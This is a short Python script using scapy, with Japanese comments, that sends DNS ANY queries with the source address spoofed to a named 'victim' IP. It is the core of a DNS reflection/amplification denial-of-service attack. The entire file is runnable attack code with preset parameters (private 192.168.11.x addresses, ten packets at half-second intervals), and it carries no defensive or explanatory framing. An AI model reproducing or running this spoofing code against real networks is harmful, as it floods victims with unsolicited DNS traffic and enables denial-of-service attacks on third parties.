from scapy.all import *
import time

def send_spoofed_dns_any(victim_ip, dns_server_ip, qname, count=10, interval=1.0):
    print(f"\n[+] Sending {count} ANY DNS queries for {qname} from spoofed IP {victim_ip} to DNS server {dns_server_ip}...")

    ip = IP(src=victim_ip, dst=dns_server_ip)
    udp = UDP(sport=53, dport=53)
    dns = DNS(rd=1, qd=DNSQR(qname=qname, qtype=255))  # qtype=255 → ANY

    pkt = ip / udp / dns

    for i in range(count):
        print(f"[*] Sending packet {i+1}/{count}")
        send(pkt, verbose=0)
        time.sleep(interval)  # 送信間隔（秒）

# --- 実行パラメータ設定 --- #
victim_ip = "192.168.11.100"        # 偽装する送信元IP
dns_server_ip = "192.168.11.53"     # DNSサーバのIP
domain = "takkesan.com"             # 問い合わせ対象ドメイン
send_count = 10                     # 送信回数
send_interval = 0.5                 # 送信間隔（秒）

# 実行
send_spoofed_dns_any(victim_ip, dns_server_ip, domain, count=send_count, interval=send_interval)

